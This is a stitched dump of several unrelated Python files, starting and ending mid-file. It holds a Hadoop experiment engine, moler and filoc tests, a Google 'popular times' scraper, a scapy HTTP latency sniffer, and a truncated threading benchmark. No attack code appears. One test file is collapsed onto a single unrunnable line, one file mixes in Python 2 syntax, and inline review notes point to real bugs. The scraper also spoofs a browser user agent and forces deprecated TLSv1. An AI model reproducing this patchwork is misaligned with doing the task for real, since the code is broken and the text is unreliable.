        self.job_id = self.options.job_id if self.options.job_id \
            else self._make_reservation(self.site)
        if not self.job_id:
            return None
        EX5.wait_oar_job_start(self.job_id, self.site)
        return EX5.get_oar_job_nodes(self.job_id, self.site)

    def _make_reservation(self, site):
        """Make a new reservation; returns the OAR job id or None if no slot"""
        elements = {self.options.ad_cluster: 1,
                    self.options.work_cluster: self.options.n_nodes}
        logger.info('Finding slot for the experiment '
                    '\nActiveData %s:1\nHadoop %s:%s',
                    style.host(self.options.ad_cluster).rjust(5),
                    style.emph(self.options.work_cluster).rjust(5),
                    style.emph(self.options.n_nodes))
        planning = funk.get_planning(elements)
        slots = funk.compute_slots(planning,
                                   walltime=self.options.walltime,
                                   excluded_elements=EXCLUDED_ELEMENTS)
        slot = funk.find_free_slot(slots, elements)
        if not slot[0]:
            return None
        startdate = slot[0]
        resources = funk.distribute_hosts(slot[2], elements,
                                          excluded_elements=EXCLUDED_ELEMENTS)
        jobs_specs = funk.get_jobs_specs(resources, name=job_name,
                                         excluded_elements=EXCLUDED_ELEMENTS)
        # Python 2 print statement (debug output)
        print jobs_specs
        sub, site = jobs_specs[0]
        sub.additional_options = "-t deploy"
        sub.reservation_date = startdate
        sub.walltime = self.options.walltime
        jobs = EX5.oarsub([(sub, site)])
        job_id = jobs[0][0]
        logger.info('Job %s will start at %s',
                    style.emph(job_id),
                    style.log_header(EX.time_utils.format_date(startdate)))
        return job_id

    def _get_logs(self, hadoop_cluster, service_host):
        """Fetch Hadoop logs and the Active Data measurement back locally."""
        # Output from the jobtracker
        EX.Get([hadoop_cluster.master],
               [HADOOP_LOG_PATH + "hadoop-root-jobtracker-{{{host}}}.log"],
               local_location=self.result_dir).run()
        # Output from the tasktrackers
        logger.info(hadoop_cluster.hosts)
        EX.Get(hadoop_cluster.hosts,
               [HADOOP_LOG_PATH + "hadoop-root-tasktracker-{{{host}}}.log"],
               local_location=self.result_dir).run()
        # The actual measure, on the service
        EX.Get([service_host], [AD_RESULT_PATH],
               local_location=self.result_dir).run()
        # We don't want to interfere with the next experiment
        EX.Remote('rm -f ' + AD_RESULT_PATH, [service_host]).run()


def sizeof_fmt(num, suffix='B'):
    """Human-readable size using decimal (base-1000, SI) units."""
    for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
        if abs(num) < 1000.0:
            return "%3.1f%s%s" % (num, unit, suffix)
        num /= 1000.0
    return "%.1f%s%s" % (num, 'Y', suffix)


def timestamp2str(timestamp):
    """Format a UNIX timestamp as 'YYYY-mm-dd HH:MM:SS' (local time)."""
    return datetime.datetime.fromtimestamp(timestamp).strftime("%Y-%m-%d %H:%M:%S")


def prediction(timestamp):
    # NOTE(review): _log is called on the class, not on an instance --
    # confirm the Engine base class provides it as a class-level helper.
    start = timestamp2str(timestamp)
    ad_hadoop._log("Waiting for job to start (prediction: {0})".format(start), False)


class FileOutputHandler(ProcessOutputHandler):
    # File object the handler appends to
    __file = None

    def __init__(self, path):
        # NOTE(review): should probably be super(FileOutputHandler, self);
        # passing the parent class here skips ProcessOutputHandler.__init__.
        super(ProcessOutputHandler, self).__init__()
        self.__file = open(path, 'a')

    def __del__(self):
        self.__file.flush()
        self.__file.close()

    def read(self, process, string, eof=False, error=False):
        self.__file.write(string)
        self.__file.flush()

    def read_line(self, process, string, eof=False, error=False):
        # NOTE(review): time.localtime() returns a struct_time, which has no
        # strftime method -- this line would raise AttributeError if reached;
        # also the format string has an unmatched '['. Confirm.
        self.__file.write(time.localtime().strftime("[%d-%m-%y %H:%M:%S"))
        self.__file.write(' ')
        self.__file.write(string)
        self.__file.flush()


###################
# Main
###################
if __name__ == "__main__":
    engine = ad_hadoop()
    engine.start()
test_connection_observer_with_runner.py
# -*- coding: utf-8 -*-
"""
Testing connection observer with runner based on threads
- call as function (synchronous)
- call as future (asynchronous)
"""

__author__ = 'Grzegorz Latuszek'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = 'grzegorz.latuszek@nokia.com'

import threading
import time

import pytest

from moler.connection_observer import ConnectionObserver


def test_calling_connection_observer_returns_result(net_down_detector_and_ping_output):
    """Connection observer should behave like function for synchronous call"""
    connection_observer, ping_lines = net_down_detector_and_ping_output

    def inject_data():
        # Simulate external I/O: feed ping output into the observer's
        # connection from a separate thread, one line every 100 ms,
        # after a short startup delay.
        time.sleep(0.3)
        for line in ping_lines:
            time.sleep(0.1)
            moler_conn = connection_observer.connection
            moler_conn.data_received(line)

    ext_io = threading.Thread(target=inject_data)
    try:
        # we use it as function so we want verb:
        detect_network_down = connection_observer
        ext_io.start()
        # calling the observer blocks until it completes
        result = detect_network_down()
        assert detect_network_down.done()
        assert result == detect_network_down.result()
    finally:  # test cleanup
        ext_io.join()


def test_connection_observer_behaves_like_future(net_down_detector_and_ping_output):
    """For async call"""
    connection_observer, ping_lines = net_down_detector_and_ping_output

    def inject_data():
        # Same external-I/O simulation as in the synchronous test above.
        time.sleep(0.3)
        for line in ping_lines:
            time.sleep(0.1)
            moler_conn = connection_observer.connection
            moler_conn.data_received(line)

    ext_io = threading.Thread(target=inject_data)
    try:
        # we use it as future so we want noun:
        network_down_detector = connection_observer
        ext_io.start()
        future = network_down_detector.start()
        assert not future.done()
        assert not future.cancelled()
        assert future == network_down_detector
        time.sleep(0.1)  # give concurrency-of-future a chance to gain control
        assert future.running()
        result = network_down_detector.await_done(timeout=2.0)
        assert result == network_down_detector.result()
    finally:  # test cleanup
        ext_io.join()

# TODO: tests for error cases


# --------------------------- resources ---------------------------


class NetworkDownDetector(ConnectionObserver):
    """Observer that completes when 'Network is unreachable' shows up."""

    def __init__(self, connection=None):
        super(NetworkDownDetector, self).__init__(connection=connection)

    def data_received(self, data):
        """
        Awaiting change like:
        64 bytes from 10.0.2.15: icmp_req=3 ttl=64 time=0.045 ms
        ping: sendmsg: Network is unreachable
        """
        if not self.done():
            if "Network is unreachable" in data:
                # result is the detection timestamp
                when_detected = time.time()
                self.set_result(result=when_detected)


@pytest.fixture()
def net_down_detector():
    # imported lazily so merely collecting the module doesn't require it
    from moler.observable_connection import ObservableConnection
    moler_conn = ObservableConnection()
    observer = NetworkDownDetector(connection=moler_conn)
    return observer


ping_output = '''
greg@debian:~$ ping 10.0.2.15
PING 10.0.2.15 (10.0.2.15) 56(84) bytes of data.
64 bytes from 10.0.2.15: icmp_req=1 ttl=64 time=0.080 ms
64 bytes from 10.0.2.15: icmp_req=2 ttl=64 time=0.037 ms
64 bytes from 10.0.2.15: icmp_req=3 ttl=64 time=0.045 ms
ping: sendmsg: Network is unreachable
ping: sendmsg: Network is unreachable
ping: sendmsg: Network is unreachable
64 bytes from 10.0.2.15: icmp_req=7 ttl=64 time=0.123 ms
64 bytes from 10.0.2.15: icmp_req=8 ttl=64 time=0.056 ms
'''


@pytest.fixture()
def net_down_detector_and_ping_output(net_down_detector):
    # splitlines(True) keeps the trailing newlines, mimicking real I/O reads
    ping_lines = ping_output.splitlines(True)
    return net_down_detector, ping_lines
test_concurrency.py
""" Test """ import os import shutil import socket import tempfile import threading import time import unittest from threading import Thread from filoc import filoc from filoc.core import LockException # noinspection DuplicatedCode,PyMissingOrEmptyDocstring class TestFilocConcurrency(unittest.TestCase): def setUp(self): self.maxDiff = None self.test_dir = tempfile.mkdtemp().replace('\\', '/') self.loc = filoc(self.test_dir + r'/id={id:d}/myfile.json', writable=True) def tearDown(self): shutil.rmtree(self.test_dir) def test_lock_block(self): with self.loc.lock(): self.loc.write_content({'id' : 1, 'val' : 1}) res = self.loc.read_content(id=1) print(res) def test_lock_info(self): host = socket.gethostname() pid = os.getpid() thread = threading.get_ident() self.assertIsNone(self.loc.lock_info()) with self.loc.lock(): lock_info = self.loc.lock_info() self.assertEqual(lock_info['host'], host) self.assertEqual(lock_info['pid'], pid) self.assertEqual(lock_info['thread'], thread) self.loc.write_content({'id' : 1, 'val' : 1}) res = self.loc.read_content(id=1) print(res) self.assertIsNone(self.loc.lock_info()) def test_lock_force(self): self.loc.lock().__enter__() self.loc.lock_force_release() self.assertIsNone(self.loc.lock_info()) def test_lock_force2(self): with self.loc.lock(): self.loc.lock_force_release() self.assertIsNone(self.loc.lock_info()) def test_lock_reenter(self): with self.loc.lock(): with self.loc.lock(): pass def test_lock_enter_from_other_thread(self): state = 0 def wait_state_and_increment(expected_state): nonlocal state while state != expected_state: time.sleep(0.1) state += 1 def async_lock(): with self.loc.lock(): wait_state_and_increment(1) wait_state_and_increment(4) thread = Thread(target=async_lock) # BEGIN ASYNC PLAY wait_state_and_increment(0) # state 0 --> 1 thread.start() # state 1 --> 2 (then lock is set) wait_state_and_increment(2) # state 2 --> 3 try: with self.loc.lock(attempt_count=3, attempt_secs=0.2): self.fail("this line should never be 
called") except LockException: print("lock worked") finally: wait_state_and_increment(3) # state 3 --> 4 (trigger lock release) wait_state_and_increment(5) # state 5 --> 6 (lock released) if __name__ == '__main__': unittest.main()
crawler.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import calendar
import datetime
import json
import logging
import math
import re
import ssl
import threading
import urllib.request
import urllib.parse
from time import sleep, time
from queue import Queue

import requests
from geopy import Point
from geopy.distance import vincenty, VincentyDistance

# urls for google api web service
BASE_URL = "https://maps.googleapis.com/maps/api/place/"
RADAR_URL = BASE_URL + "radarsearch/json?location={},{}&radius={}&types={}&key={}"
NEARBY_URL = BASE_URL + "nearbysearch/json?location={},{}&radius={}&types={}&key={}"
DETAIL_URL = BASE_URL + "details/json?placeid={}&key={}"

# user agent for populartimes request
USER_AGENT = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) "
                            "AppleWebKit/537.36 (KHTML, like Gecko) "
                            "Chrome/54.0.2840.98 Safari/537.36"}


class PopulartimesException(Exception):
    """Exception raised for errors in the input.

    Attributes:
        expression -- input expression in which the error occurred
        message -- explanation of the error
    """

    def __init__(self, expression, message):
        self.expression = expression
        self.message = message


def rect_circle_collision(rect_left, rect_right, rect_bottom, rect_top,
                          circle_x, circle_y, radius):
    # returns true iff circle intersects rectangle

    def clamp(val, min, max):
        # limits value to the range min..max
        # (shadows the builtins min/max on purpose, C-style port)
        if val < min:
            return min
        if val > max:
            return max
        return val

    # Find the closest point to the circle within the rectangle
    closest_x = clamp(circle_x, rect_left, rect_right);
    closest_y = clamp(circle_y, rect_bottom, rect_top);

    # Calculate the distance between the circle's center and this closest point
    dist_x = circle_x - closest_x;
    dist_y = circle_y - closest_y;

    # If the distance is less than the circle's radius, an intersection occurs
    dist_sq = (dist_x * dist_x) + (dist_y * dist_y);
    return dist_sq < (radius * radius);


def cover_rect_with_cicles(w, h, r):
    """
    fully cover a rectangle of given width and height with circles of radius r.
    This algorithm uses a hexagonal honeycomb pattern to cover the area.
    :param w: width of rectangle
    :param h: height of reclangle
    :param r: radius of circles
    :return: list of circle centers (x,y)
    """
    # initialize result list
    res = []

    # horizontal distance between circle centers
    x_dist = math.sqrt(3) * r
    # vertical distance between circle centers
    y_dist = 1.5 * r
    # number of circles per row (different for even/odd rows)
    cnt_x_even = math.ceil(w / x_dist)
    cnt_x_odd = math.ceil((w - x_dist/2) / x_dist) + 1
    # number of rows
    cnt_y = math.ceil((h-r) / y_dist) + 1

    y_offs = 0.5 * r
    for y in range(cnt_y):
        if y % 2 == 0:
            # shift even rows to the right
            x_offs = x_dist/2
            cnt_x = cnt_x_even
        else:
            x_offs = 0
            cnt_x = cnt_x_odd
        for x in range(cnt_x):
            res.append((x_offs + x*x_dist, y_offs + y*y_dist))

    # top-right circle is not always required
    if res and not rect_circle_collision(0, w, 0, h, res[-1][0], res[-1][1], r):
        res = res[0:-1]

    return res


def get_circle_centers(b1, b2, radius):
    """
    the function covers the area within the bounds with circles
    :param b1: south-west bounds [lat, lng]
    :param b2: north-east bounds [lat, lng]
    :param radius: specified radius, adapt for high density areas
    :return: list of circle centers that cover the area between lower/upper
    """
    sw = Point(b1)
    ne = Point(b2)

    # north/east distances
    dist_lat = vincenty(Point(sw[0], sw[1]), Point(ne[0], sw[1])).meters
    dist_lng = vincenty(Point(sw[0], sw[1]), Point(sw[0], ne[1])).meters

    circles = cover_rect_with_cicles(dist_lat, dist_lng, radius)
    # map the planar circle centers back to geodesic coordinates:
    # go east by c[1] meters, then north by c[0] meters from the SW corner
    cords = [
        VincentyDistance(meters=c[0])
        .destination(
            VincentyDistance(meters=c[1])
            .destination(point=sw, bearing=90),
            bearing=0
        )[:2]
        for c in circles
    ]

    return cords


def worker_radar():
    """
    worker that gets coordinates of queue and starts radar search
    :return:
    """
    while True:
        item = q_radar.get()
        get_radar(item)
        q_radar.task_done()


def get_radar(item):
    """Run one nearby-search request (or next-page request) for a circle
    center and collect the place ids that fall inside the bounds."""
    _lat, _lng = item["pos"]

    # places - nearby search
    # https://developers.google.com/places/web-service/search?hl=en#PlaceSearchRequests
    radar_str = NEARBY_URL.format(
        _lat, _lng, params["radius"], "|".join(params["type"]), params["API_key"]
    )

    # is this a next page request?
    if item["res"] > 0:
        # possibly wait remaining time until next_page_token becomes valid
        min_wait = 2  # wait at least 2 seconds before the next page request
        sec_passed = time() - item["last_req"]
        if sec_passed < min_wait:
            sleep(min_wait - sec_passed)
        radar_str += "&pagetoken=" + item["next_page_token"]

    resp = json.loads(requests.get(radar_str, auth=('user', 'pass')).text)
    check_response_code(resp)
    radar = resp["results"]

    item["res"] += len(radar)
    if item["res"] >= 60:
        # the Places API caps paged results at 60 per search
        logging.warning("Result limit in search radius reached, some data may get lost")

    bounds = params["bounds"]

    # retrieve google ids for detail search
    for place in radar:
        geo = place["geometry"]["location"]
        if bounds["lower"]["lat"] <= geo["lat"] <= bounds["upper"]["lat"] \
                and bounds["lower"]["lng"] <= geo["lng"] <= bounds["upper"]["lng"]:
            # this isn't thread safe, but we don't really care,
            # since in worst case a set entry is simply overwritten
            g_places[place["place_id"]] = place

    # if there are more results, schedule next page requests
    if "next_page_token" in resp:
        item["next_page_token"] = resp["next_page_token"]
        item["last_req"] = time()
        q_radar.put(item)


def worker_detail():
    """
    worker that gets item of queue and starts detailed data retrieval
    :return:
    """
    while True:
        item = q_detail.get()
        get_detail(item)
        q_detail.task_done()


def get_popularity_for_day(popularity):
    """
    Returns popularity for day
    :param popularity: raw day/hour popularity array from the search backend
    :return: (popularity per weekday, waiting time per weekday)
    """
    # Initialize empty matrix with 0s: 7 weekdays x 24 hours
    pop_json = [[0 for _ in range(24)] for _ in range(7)]
    wait_json = [[0 for _ in range(24)] for _ in range(7)]

    for day in popularity:
        day_no, pop_times = day[:2]
        if pop_times:
            for hour_info in pop_times:
                hour = hour_info[0]
                pop_json[day_no - 1][hour] = hour_info[1]

                # check if the waiting string is available and convert no minutes
                if len(hour_info) > 5:
                    wait_digits = re.findall(r'\d+', hour_info[3])
                    if len(wait_digits) == 0:
                        wait_json[day_no - 1][hour] = 0
                    elif "min" in hour_info[3]:
                        wait_json[day_no - 1][hour] = int(wait_digits[0])
                    elif "hour" in hour_info[3]:
                        wait_json[day_no - 1][hour] = int(wait_digits[0]) * 60
                    else:
                        # assumed format "H hours M minutes" -- TODO confirm
                        wait_json[day_no - 1][hour] = int(wait_digits[0]) * 60 + int(wait_digits[1])

                # day wrap
                if hour_info[0] == 23:
                    day_no = day_no % 7 + 1

    ret_popularity = [
        {
            "name": list(calendar.day_name)[d],
            "data": pop_json[d]
        } for d in range(7)
    ]

    # waiting time only if applicable
    ret_wait = [
        {
            "name": list(calendar.day_name)[d],
            "data": wait_json[d]
        } for d in range(7)
    ] if any(any(day) for day in wait_json) else []

    # {"name" : "monday", "data": [...]} for each weekday as list
    return ret_popularity, ret_wait


def index_get(array, *argv):
    """
    checks if a index is available in the array and returns it
    :param array: the data array
    :param argv: index integers
    :return: None if not available or the return value
    """
    try:
        for index in argv:
            array = array[index]
        return array
    # there is either no info available or no popular times
    # TypeError: rating/rating_n/populartimes wrong of not available
    except (IndexError, TypeError):
        return None


def add_optional_parameters(detail_json, detail, rating, rating_n, popularity,
                            current_popularity, time_spent):
    """
    check for optional return parameters and add them to the result json
    :param detail_json: result dict being built (mutated and returned)
    :param detail: raw place detail dict from the Places API
    :param rating: rating scraped from search, falls back to detail["rating"]
    :param rating_n: number of ratings
    :param popularity: raw popular-times array
    :param current_popularity: live popularity value
    :param time_spent: [min, max] minutes usually spent
    :return: detail_json with the available optional fields added
    """
    if rating:
        detail_json["rating"] = rating
    elif "rating" in detail:
        detail_json["rating"] = detail["rating"]
    if rating_n:
        detail_json["rating_n"] = rating_n
    if "international_phone_number" in detail:
        detail_json["international_phone_number"] = detail["international_phone_number"]
    if current_popularity:
        detail_json["current_popularity"] = current_popularity
    if popularity:
        popularity, wait_times = get_popularity_for_day(popularity)
        detail_json["populartimes"] = popularity
        if wait_times:
            detail_json["time_wait"] = wait_times
    if time_spent:
        detail_json["time_spent"] = time_spent
    return detail_json


def get_populartimes_from_search(place_identifier):
    """
    request information for a place and parse current popularity
    :param place_identifier: name and address string
    :return: (rating, rating_n, popular_times, current_popularity, time_spent)
    """
    params_url = {
        "tbm": "map",
        "tch": 1,
        "hl": "en",
        "q": urllib.parse.quote_plus(place_identifier),
        # opaque protobuf-encoded request blob expected by the maps backend
        "pb": "!4m12!1m3!1d4005.9771522653964!2d-122.42072974863942!3d37.8077459796541!2m3!1f0!2f0!3f0!3m2!1i1125!2i976"
              "!4f13.1!7i20!10b1!12m6!2m3!5m1!6e2!20e3!10b1!16b1!19m3!2m2!1i392!2i106!20m61!2m2!1i203!2i100!3m2!2i4!5b1"
              "!6m6!1m2!1i86!2i86!1m2!1i408!2i200!7m46!1m3!1e1!2b0!3e3!1m3!1e2!2b1!3e2!1m3!1e2!2b0!3e3!1m3!1e3!2b0!3e3!"
              "1m3!1e4!2b0!3e3!1m3!1e8!2b0!3e3!1m3!1e3!2b1!3e2!1m3!1e9!2b1!3e2!1m3!1e10!2b0!3e3!1m3!1e10!2b1!3e2!1m3!1e"
              "10!2b0!3e4!2b1!4b1!9b0!22m6!1sa9fVWea_MsX8adX8j8AE%3A1!2zMWk6Mix0OjExODg3LGU6MSxwOmE5ZlZXZWFfTXNYOGFkWDh"
              "qOEFFOjE!7e81!12e3!17sa9fVWea_MsX8adX8j8AE%3A564!18e15!24m15!2b1!5m4!2b1!3b1!5b1!6b1!10m1!8e3!17b1!24b1!"
              "25b1!26b1!30m1!2b1!36b1!26m3!2m2!1i80!2i92!30m28!1m6!1m2!1i0!2i0!2m2!1i458!2i976!1m6!1m2!1i1075!2i0!2m2!"
              "1i1125!2i976!1m6!1m2!1i0!2i0!2m2!1i1125!2i20!1m6!1m2!1i0!2i956!2m2!1i1125!2i976!37m1!1e81!42b1!47m0!49m1"
              "!3b1"
    }

    search_url = "https://www.google.de/search?" + "&".join(k + "=" + str(v) for k, v in params_url.items())
    logging.info("searchterm: " + search_url)

    # noinspection PyUnresolvedReferences
    gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    resp = urllib.request.urlopen(urllib.request.Request(url=search_url, data=None, headers=USER_AGENT),
                                  context=gcontext)
    data = resp.read().decode('utf-8').split('/*""*/')[0]

    # find eof json
    jend = data.rfind("}")
    if jend >= 0:
        data = data[:jend + 1]

    # the payload is JSON wrapped in JSON; strip a 4-char prefix on the inner blob
    jdata = json.loads(data)["d"]
    jdata = json.loads(jdata[4:])

    # get info from result array, has to be adapted if backend api changes
    info = index_get(jdata, 0, 1, 0, 14)

    rating = index_get(info, 4, 7)
    rating_n = index_get(info, 4, 8)

    popular_times = index_get(info, 84, 0)

    # current_popularity is also not available if popular_times isn't
    current_popularity = index_get(info, 84, 7, 1)

    time_spent = index_get(info, 117, 0)

    # extract wait times and convert to minutes
    if time_spent:
        nums = [float(f) for f in re.findall(r'\d*\.\d+|\d+', time_spent.replace(",", "."))]
        contains_min, contains_hour = "min" in time_spent, "hour" in time_spent or "hr" in time_spent

        time_spent = None

        if contains_min and contains_hour:
            time_spent = [nums[0], nums[1] * 60]
        elif contains_hour:
            time_spent = [nums[0] * 60, (nums[0] if len(nums) == 1 else nums[1]) * 60]
        elif contains_min:
            time_spent = [nums[0], nums[0] if len(nums) == 1 else nums[1]]

        # NOTE(review): if the string contains neither "min" nor "hour"/"hr",
        # time_spent stays None and the conversion below raises TypeError.
        time_spent = [int(t) for t in time_spent]

    return rating, rating_n, popular_times, current_popularity, time_spent


def get_detail(place_id):
    """
    loads data for a given area
    :return:
    """
    global results

    # detail_json = get_populartimes(params["API_key"], place_id)
    detail_json = get_populartimes_by_detail(params["API_key"], g_places[place_id])

    if params["all_places"] or "populartimes" in detail_json:
        results.append(detail_json)


def get_populartimes(api_key, place_id):
    """
    sends request to detail to get a search string and uses standard proto buffer to get additional information
    on the current status of popular times
    :return: json details
    """
    # places api - detail search
    # https://developers.google.com/places/web-service/details?hl=de
    detail_str = DETAIL_URL.format(place_id, api_key)
    resp = json.loads(requests.get(detail_str, auth=('user', 'pass')).text)
    check_response_code(resp)
    detail = resp["result"]

    return get_populartimes_by_detail(api_key, detail)


def get_populartimes_by_detail(api_key, detail):
    """Build the result dict for one place from its detail record, then
    enrich it with scraped popularity data."""
    address = detail["formatted_address"] if "formatted_address" in detail else detail.get("vicinity", "")
    place_identifier = "{} {}".format(detail["name"], address)

    detail_json = {
        "id": detail["place_id"],
        "name": detail["name"],
        "address": address,
        "types": detail["types"],
        "coordinates": detail["geometry"]["location"]
    }

    detail_json = add_optional_parameters(detail_json, detail,
                                          *get_populartimes_from_search(place_identifier))

    return detail_json


def check_response_code(resp):
    """
    check if query quota has been surpassed or other errors occured
    :param resp: json response
    :return:
    """
    if resp["status"] == "OK" or resp["status"] == "ZERO_RESULTS":
        return
    if resp["status"] == "REQUEST_DENIED":
        raise PopulartimesException("Google Places " + resp["status"],
                                    "Request was denied, the API key is invalid.")
    if resp["status"] == "OVER_QUERY_LIMIT":
        raise PopulartimesException("Google Places " + resp["status"],
                                    "You exceeded your Query Limit for Google Places API Web Service, "
                                    "check https://developers.google.com/places/web-service/usage "
                                    "to upgrade your quota.")
    if resp["status"] == "INVALID_REQUEST":
        raise PopulartimesException("Google Places " + resp["status"],
                                    "The query string is malformed, "
                                    "check if your formatting for lat/lng and radius is correct.")
    # NOTE(review): exact duplicate of the INVALID_REQUEST branch above -- dead code.
    if resp["status"] == "INVALID_REQUEST":
        raise PopulartimesException("Google Places " + resp["status"],
                                    "The query string is malformed, "
                                    "check if your formatting for lat/lng and radius is correct.")
    if resp["status"] == "NOT_FOUND":
        raise PopulartimesException("Google Places " + resp["status"],
                                    "The place ID was not found and either does not exist or was retired.")
    raise PopulartimesException("Google Places " + resp["status"],
                                "Unidentified error with the Places API, please check the response code")


def run(_params):
    """
    wrap execution logic in method, for later external call
    :return: list of place dicts with popularity data
    """
    # shared module-level state used by the daemon worker threads
    global params, g_places, q_radar, q_detail, results

    start = datetime.datetime.now()

    # shared variables
    params = _params
    q_radar, q_detail = Queue(), Queue()
    g_places, results = dict(), list()

    logging.info("Adding places to queue...")

    # threading for radar search
    for i in range(params["n_threads"]):
        t = threading.Thread(target=worker_radar)
        t.daemon = True
        t.start()

    # cover search area with circles
    bounds = params["bounds"]
    for lat, lng in get_circle_centers([bounds["lower"]["lat"], bounds["lower"]["lng"]],  # southwest
                                       [bounds["upper"]["lat"], bounds["upper"]["lng"]],  # northeast
                                       params["radius"]):
        q_radar.put(dict(pos=(lat, lng), res=0))

    q_radar.join()
    logging.info("Finished in: {}".format(str(datetime.datetime.now() - start)))

    logging.info("{} places to process...".format(len(g_places)))

    # threading for detail search and popular times
    for i in range(params["n_threads"]):
        t = threading.Thread(target=worker_detail)
        t.daemon = True
        t.start()

    for g_place_id in g_places:
        q_detail.put(g_place_id)

    q_detail.join()
    logging.info("Finished in: {}".format(str(datetime.datetime.now() - start)))

    return results
collect.py
#!/usr/bin/env python3
# Sniffs HTTP traffic, matches requests to responses by TCP 4-tuple, and
# ships per-request latency metrics (HMAC-signed) to an ingestion endpoint.
from scapy.all import sniff, IP, TCP
from scapy.layers.http import HTTPRequest, HTTPResponse
from Crypto import Random
import os
import queue
import threading
import hashlib
import json
import hmac
import base64
import ipaddress
import requests
import time

ENCODING = 'utf-8'
BYTEORDER = 'big'

# captured packets awaiting processing
pkts = queue.Queue()
# signed metric payloads awaiting upload
reqs = queue.Queue()
# in-flight requests keyed by TCP flow (TCPIP instance)
idMap = {}

# nanoseconds per second; timestamps/durations are in ns
TIMEUNIT = 1000000000


class TCPIP:
    """Hashable (src, dst, sport, dport) 4-tuple identifying a TCP flow."""

    def __init__(self, src, dst, sport, dport):
        self.src = ipaddress.ip_address(src)
        self.dst = ipaddress.ip_address(dst)
        self.sport = sport
        self.dport = dport

    def __hash__(self):
        return hash(self.src) ^ hash(self.dst) ^ hash(self.sport) ^ hash(self.dport)

    def __eq__(self, other):
        return self.src == other.src and self.dst == other.dst and self.sport == other.sport and self.dport == other.dport


def send():
    """Uploader thread: forever POST signed payloads to the endpoint."""
    ENDPOINT = 'https://' + INFLUX_ADDR
    S = requests.Session()
    while True:
        req = reqs.get()
        S.post(ENDPOINT + '/update', json=req)


def genreq(payload):
    """Wrap a metrics payload with a nonce and a 60 s expiry, sign it with
    HMAC-SHA256 (key INFLUX_SKEY), and enqueue it for upload."""
    tag = {}
    tag['nonce'] = int.from_bytes(Random.get_random_bytes(16), byteorder=BYTEORDER)
    expireTime = time.time() + 60
    secs = int(expireTime)
    nanos = int((expireTime - secs) * TIMEUNIT)
    expires = {}
    expires['secs'] = secs
    expires['nanos'] = nanos
    tag['expires'] = expires
    tag['payload'] = payload
    # compact separators so the signed bytes are canonical
    message = json.dumps(tag, separators=(',', ':'))
    mac = hmac.new(INFLUX_SKEY, msg=bytes(message, ENCODING), digestmod='sha256').digest()
    sig = base64.b64encode(mac)
    req = {}
    req['message'] = message
    req['sig'] = str(sig, ENCODING)
    reqs.put(req)


def process():
    """Matcher thread: pair HTTP requests with their responses.

    Requests carrying an X-Request-ID header are stored in idMap keyed by
    their TCP flow; a response on the reversed flow closes the entry and
    emits a metric with the request/response time delta (ns).
    """
    while True:
        pkt = pkts.get()
        if pkt.haslayer(HTTPRequest):
            reqId = pkt[HTTPRequest].X_Request_ID
            if reqId != None:
                metrics = {}
                metrics['time'] = round(pkt.time * TIMEUNIT)
                metrics['method'] = pkt[HTTPRequest].Method.decode()
                metrics['uri'] = pkt[HTTPRequest].Path.decode()
                metrics['name'] = INFLUX_NAME
                metrics['gateway'] = False
                tcpip = {}
                metrics['tcpip'] = tcpip
                # stable numeric id derived from the X-Request-ID header
                h = hashlib.md5()
                h.update(reqId)
                metrics['id'] = int.from_bytes(h.digest(), byteorder=BYTEORDER)
                src = pkt[IP].src
                dst = pkt[IP].dst
                sport = pkt[TCP].sport
                dport = pkt[TCP].dport
                tcpip['src'] = src
                tcpip['dst'] = dst
                tcpip['sport'] = sport
                tcpip['dport'] = dport
                k = TCPIP(src, dst, sport, dport)
                idMap[k] = metrics
        elif pkt.haslayer(HTTPResponse):
            src = pkt[IP].src
            dst = pkt[IP].dst
            sport = pkt[TCP].sport
            dport = pkt[TCP].dport
            # reversed tuple: the response flows back toward the requester
            k = TCPIP(dst, src, dport, sport)
            if k in idMap.keys():
                metrics = idMap[k]
                del idMap[k]
                newTimestamp = round(pkt.time * TIMEUNIT)
                metrics['duration'] = newTimestamp - metrics['time']
                genreq(metrics)


def cap(pkt):
    # sniff() callback: hand the packet to the processing thread
    pkts.put(pkt)


def setup():
    """Read and validate configuration from the environment; exits on any
    missing variable. Sets the INFLUX_* module globals."""
    global INFLUX_SKEY, INFLUX_ADDR, INFLUX_IFACE, INFLUX_NAME
    INFLUX_SKEY = os.getenv('INFLUX_SKEY')
    if INFLUX_SKEY == None:
        print('Key not set.')
        exit(-1)
    # the signing key is provided base64-encoded
    INFLUX_SKEY = base64.b64decode(INFLUX_SKEY)
    INFLUX_ADDR = os.getenv('INFLUX_ADDR')
    if INFLUX_ADDR == None:
        print('Address not set.')
        exit(-1)
    INFLUX_IFACE = os.getenv('INFLUX_IFACE')
    if INFLUX_IFACE == None:
        print('Interface not set.')
        exit(-1)
    INFLUX_NAME = os.getenv('INFLUX_NAME')
    if INFLUX_NAME == None:
        print('Database not set.')
        exit(-1)


setup()
# uploader and matcher run as daemons; sniff() blocks the main thread
threading.Thread(target=send, daemon=True).start()
threading.Thread(target=process, daemon=True).start()
sniff(filter='tcp', prn=cap, iface=INFLUX_IFACE, store=False)
thread_process_multicores.py
# 对比多线程和多进程在多核CPU上执行计算密集和IO密集型任务的效率
# (Compare the efficiency of multithreading vs. multiprocessing for
# CPU-bound and I/O-bound tasks on a multi-core CPU.)
import threading, multiprocessing
import os, time, math


def task_cpu(n):
    """CPU-bound workload: accumulate sums of sines for i in [2, n).

    The result is intentionally discarded -- only the elapsed time matters.
    """
    x = 0.0
    for i in range(2, n):
        # inner loop variable renamed to `j` so it no longer shadows the
        # outer index `i`; the computed values are unchanged
        x += sum([math.sin(j) for j in range(i)])


def task_io(n):
    """I/O-bound workload: block the calling thread n times for 5 ms each."""
    for _ in range(n):
        time.sleep(0.005)


def _start_and_join(workers):
    """Start every worker (Thread or Process), then wait for each of them.

    BUG FIX: the original code joined with
        for thead in threads: if thread.is_alive(): thread.join()
    -- a loop-variable typo (`thead` vs `thread`) that left `thread` bound
    to the last-started worker, so only that one was ever joined and the
    reported timings could be wrong.  join() returns immediately on an
    already-finished worker, so no is_alive() guard is needed.
    """
    for w in workers:
        w.start()
    for w in workers:
        w.join()


if __name__ == '__main__':
    n_workers = os.cpu_count()

    # CPU-bound task with threads (GIL-serialized)
    print("启动多线程计算密集型任务")
    start = time.time()
    _start_and_join([threading.Thread(target=task_cpu, args=(3000, ))
                     for _ in range(n_workers)])
    end = time.time()
